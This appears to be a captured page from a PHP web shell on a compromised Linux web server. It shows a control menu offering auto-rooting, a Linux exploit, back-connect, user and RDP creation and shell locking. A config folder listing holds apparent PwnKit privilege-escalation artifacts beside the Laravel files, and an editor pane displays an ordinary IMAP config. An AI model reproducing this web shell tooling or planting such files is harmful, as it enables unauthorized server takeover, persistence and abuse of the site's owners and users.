Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
iosCertificates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
api.php
1.03
KB
-rw-r--r--
app.php
10.93
KB
-rw-r--r--
auth.php
3.74
KB
-rw-r--r--
backup.php
9.11
KB
-rw-r--r--
broadcasting.php
2.21
KB
-rw-r--r--
cache.php
3.07
KB
-rw-r--r--
cashier.php
4.96
KB
-rw-r--r--
cors.php
1.09
KB
-rw-r--r--
database.php
4.99
KB
-rw-r--r--
datatables-buttons.php
2.22
KB
-rw-r--r--
datatables-html.php
719
B
-rw-r--r--
debugbar.php
8.49
KB
-rw-r--r--
dompdf.php
11.14
KB
-rw-r--r--
entrust.php
5.13
KB
-rw-r--r--
entrust_seeder.php
560
B
-rw-r--r--
error_log
15.56
KB
-rw-r--r--
excel.php
11.97
KB
-rw-r--r--
filesystems.php
4.49
KB
-rw-r--r--
flutterwave.php
749
B
-rw-r--r--
fortify.php
4.74
KB
-rw-r--r--
froiden_envato.php
1.79
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
imap.php
7.79
KB
-rw-r--r--
installer.php
1.29
KB
-rw-r--r--
laravel-device-tracking.php
785
B
-rw-r--r--
laravel_google_translate.php
552
B
-rw-r--r--
location.php
3.59
KB
-rw-r--r--
log-viewer.php
7.05
KB
-rw-r--r--
logcleaner.php
907
B
-rw-r--r--
logging.php
2.93
KB
-rw-r--r--
mail.php
3.45
KB
-rw-r--r--
modules.php
10.41
KB
-rw-r--r--
mollie.php
1.93
KB
-rw-r--r--
onesignal.php
537
B
-rw-r--r--
payfast.php
1.37
KB
-rw-r--r--
paystack.php
724
B
-rw-r--r--
pushnotification.php
530
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
3.37
KB
-rw-r--r--
sanctum.php
2.24
KB
-rw-r--r--
sentry.php
1.7
KB
-rw-r--r--
services.php
3.07
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
translation-manager.php
1.45
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
xss_ignore.php
461
B
-rw-r--r--
zoom.php
443
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : imap.php
<?php /* * File: imap.php * Category: config * Author: M. Goldenbaum * Created: 24.09.16 22:36 * Updated: - * * Description: * - */ return [ /* |-------------------------------------------------------------------------- | IMAP default account |-------------------------------------------------------------------------- | | The default account identifier. It will be used as default for any missing account parameters. | If however the default account is missing a parameter the package default will be used. | Set to 'false' [boolean] to disable this functionality. | */ 'default' => env('IMAP_DEFAULT_ACCOUNT', 'default'), /* |-------------------------------------------------------------------------- | Default date format |-------------------------------------------------------------------------- | | The default date format is used to convert any given Carbon::class object into a valid date string. | These are currently known working formats: "d-M-Y", "d-M-y", "d M y" | */ 'date_format' => 'd-M-Y', /* |-------------------------------------------------------------------------- | Available IMAP accounts |-------------------------------------------------------------------------- | | Please list all IMAP accounts which you are planning to use within the | array below. | */ 'accounts' => [ 'default' => [// account identifier 'host' => env('IMAP_HOST', 'localhost'), 'port' => env('IMAP_PORT', 993), 'protocol' => env('IMAP_PROTOCOL', 'imap'), // Might also use imap, [pop3 or nntp (untested)] 'encryption' => env('IMAP_ENCRYPTION', 'ssl'), // Supported: false, 'ssl', 'tls', 'notls', 'starttls' 'validate_cert' => env('IMAP_VALIDATE_CERT', true), 'username' => env('IMAP_USERNAME', 'root@example.com'), 'password' => env('IMAP_PASSWORD', ''), 'authentication' => env('IMAP_AUTHENTICATION', null), 'proxy' => [ 'socket' => null, 'request_fulluri' => false, 'username' => null, 'password' => null, ] ], /* 'gmail' => [ // account identifier 'host' => 'imap.gmail.com', 'port' => 993, 'encryption' => 'ssl', 'validate_cert' => true, 'username' => 'example@gmail.com', 'password' => 'PASSWORD', 'authentication' => 'oauth', ], 'another' => [ // account identifier 'host' => '', 'port' => 993, 'encryption' => false, 'validate_cert' => true, 'username' => '', 'password' => '', 'authentication' => null, ] */ ], /* |-------------------------------------------------------------------------- | Available IMAP options |-------------------------------------------------------------------------- | | Available php imap config parameters are listed below | -Delimiter (optional): | This option is only used when calling $oClient-> | You can use any supported char such as ".", "/", (...) | -Fetch option: | IMAP::FT_UID - Message marked as read by fetching the message body | IMAP::FT_PEEK - Fetch the message without setting the "seen" flag | -Fetch sequence id: | IMAP::ST_UID - Fetch message components using the message uid | IMAP::ST_MSGN - Fetch message components using the message number | -Body download option | Default TRUE | -Flag download option | Default TRUE | -Message key identifier option | You can choose between 'id', 'number' or 'list' | 'id' - Use the MessageID as array key (default, might cause hickups with yahoo mail) | 'number' - Use the message number as array key (isn't always unique and can cause some interesting behavior) | 'list' - Use the message list number as array key (incrementing integer (does not always start at 0 or 1) | 'uid' - Use the message uid as array key (isn't always unique and can cause some interesting behavior) | -Fetch order | 'asc' - Order all messages ascending (probably results in oldest first) | 'desc' - Order all messages descending (probably results in newest first) | -Disposition types potentially considered an attachment | Default ['attachment', 'inline'] | -Common folders | Default folder locations and paths assumed if none is provided | -Open IMAP options: | DISABLE_AUTHENTICATOR - Disable authentication properties. | Use 'GSSAPI' if you encounter the following | error: "Kerberos error: No credentials cache | file found (try running kinit) (...)" | or ['GSSAPI','PLAIN'] if you are using outlook mail | -Decoder options (currently only the message subject and attachment name decoder can be set) | 'utf-8' - Uses imap_utf8($string) to decode a string | 'mimeheader' - Uses mb_decode_mimeheader($string) to decode a string | */ 'options' => [ 'delimiter' => '/', 'fetch' => \Webklex\PHPIMAP\IMAP::FT_PEEK, /* 'sequence' => \Webklex\PHPIMAP\IMAP::ST_MSGN, */ 'sequence' => \Webklex\PHPIMAP\IMAP::ST_UID, 'fetch_body' => true, 'fetch_flags' => true, 'message_key' => 'list', 'fetch_order' => 'asc', 'dispositions' => ['attachment', 'inline'], 'common_folders' => [ 'root' => 'INBOX', 'junk' => 'INBOX/Junk', 'draft' => 'INBOX/Drafts', 'sent' => 'INBOX/Sent', 'trash' => 'INBOX/Trash', ], 'open' => [ /* 'DISABLE_AUTHENTICATOR' => 'GSSAPI' */ ], 'decoder' => [ 'message' => 'utf-8', // mimeheader 'attachment' => 'utf-8' // mimeheader ] ], /* |-------------------------------------------------------------------------- | Available events |-------------------------------------------------------------------------- | */ 'events' => [ 'message' => [ 'new' => \Webklex\IMAP\Events\MessageNewEvent::class, 'moved' => \Webklex\IMAP\Events\MessageMovedEvent::class, 'copied' => \Webklex\IMAP\Events\MessageCopiedEvent::class, 'deleted' => \Webklex\IMAP\Events\MessageDeletedEvent::class, 'restored' => \Webklex\IMAP\Events\MessageRestoredEvent::class, ], 'folder' => [ 'new' => \Webklex\IMAP\Events\FolderNewEvent::class, 'moved' => \Webklex\IMAP\Events\FolderMovedEvent::class, 'deleted' => \Webklex\IMAP\Events\FolderDeletedEvent::class, ], 'flag' => [ 'new' => \Webklex\IMAP\Events\FlagNewEvent::class, 'deleted' => \Webklex\IMAP\Events\FlagDeletedEvent::class, ], ], /* |-------------------------------------------------------------------------- | Available masking options |-------------------------------------------------------------------------- | | By using your own custom masks you can implement your own methods for | a better and faster access and less code to write. | | Checkout the two examples custom_attachment_mask and custom_message_mask | for a quick start. | | The provided masks below are used as the default masks. */ 'masks' => [ 'message' => \Webklex\PHPIMAP\Support\Masks\MessageMask::class, 'attachment' => \Webklex\PHPIMAP\Support\Masks\AttachmentMask::class ] ];
Close